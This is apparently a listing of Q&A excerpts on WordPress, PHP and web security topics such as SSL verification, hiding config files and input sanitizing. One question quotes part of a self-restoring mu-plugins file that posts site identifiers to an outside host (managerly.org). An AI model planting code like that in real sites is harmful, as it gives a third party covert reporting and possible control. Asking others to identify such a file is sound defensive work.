The ‘https_local_ssl_verify’ filter

I have run into some WordPress code which does POST requests to API sites and in the POST parameters for the SSL property it has $params = array( 'body' => $_POST, 'sslverify' => apply_filters('https_local_ssl_verify', false)); So why not simply put false or true? 1 Answer: The apply_filters() function lets plugins and themes override the …

PHP $_SERVER['HTTP_HOST'] vs. $_SERVER['SERVER_NAME'], am I understanding the man pages correctly?

I did a lot of searching and also read the PHP $_SERVER docs. Do I have this right regarding which to use for my PHP scripts for simple link definitions used throughout my site? $_SERVER['SERVER_NAME'] is based on your web server’s config file (Apache2 in my case), and varies depending on a few directives: (1) …

No option “I would like my site to be private, visible only to users I choose” in Privacy Settings

I am running WordPress 3.3.2 self-hosted. I used to see the option “I would like my site to be private, visible only to users I choose” under Privacy Settings but I no longer see this option. Instead, now I only see the options to make the blog visible or not visible to search engines, but …

How to improve WordPress security by hiding non public facing files?

e.g. curl -I http://ma.tt/blog/wp-config.php 200 OK The wp-config.php is not a public-facing file, since it currently just returns a blank page, so why not return 404 instead? (so it will not be cached by Google) Also, a file such as readme.html should be hidden as it discloses your WordPress version, e.g. http://ma.tt/blog/readme.html So, currently I have …

rms_unique_wp_mu_pl_fl_nm.php

What is creating this file? It’s in the /wp-content/mu-plugins directory. If I delete it, it comes back after a while. It contains this code: <?php if(!function_exists('do_rms_activation_task')) { /* ————Register Config Variables———— */ $GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php'; $GLOBALS['rms_disclaimer_text'] = []; $GLOBALS['rms_ajax_del_request'] = false; function send_rms_curl_request($action, $body) { $body['action'] = $action; $body['remote_site_hash'] = get_option('rms_remote_site_hash', ''); $body['remote_site_id'] = get_option('rms_remote_site_id', 0); …

AngularJS changes URLs to “unsafe:” in extension page

I am trying to use Angular with a list of apps, and each one is a link to see an app in more detail (apps/app.id): <a id="{{app.id}}" href="https://stackoverflow.com/questions/15606751/apps/{{app.id}}" >{{app.name}}</a> Every time I click on one of these links, Chrome shows the URL as unsafe:chrome-extension://kpbipnfncdpgejhmdneaagc…/apps/app.id Where does the unsafe: come from?

Are default functions like update_post_meta safe to use with user inputs?

Are default functions like update_post_meta() safe to use with user inputs? e.g. update_post_meta(76, 'my_key', $_GET['value']) Or should I use $_GET['value'] = sanitize_text_field($_GET['value']); before using update_post_meta(76, 'my_key', $_GET['value']) 2 Answers: After upvoting @pieter’s answer…. In recent times I came to the realization that it is much better to handle “bad” data gracefully when it is used …

How serious is this new ASP.NET security vulnerability and how can I work around it?

I’ve just read on the net about a newly discovered security vulnerability in ASP.NET. You can read the details here. The problem lies in the way that ASP.NET implements the AES encryption algorithm to protect the integrity of the cookies these applications generate to store information during user sessions. This is a bit vague, but …

Is it good security advice to install WordPress in a subdirectory but link to root?

Is it good to install WordPress in a subdirectory (with a random name), but set “Homepage” address to domain root? (based on Giving WordPress Its Own Directory) Since the wp-content is in the subdirectory and every link to photos and other files (including plugins css and js) in homepage, includes the full path of content …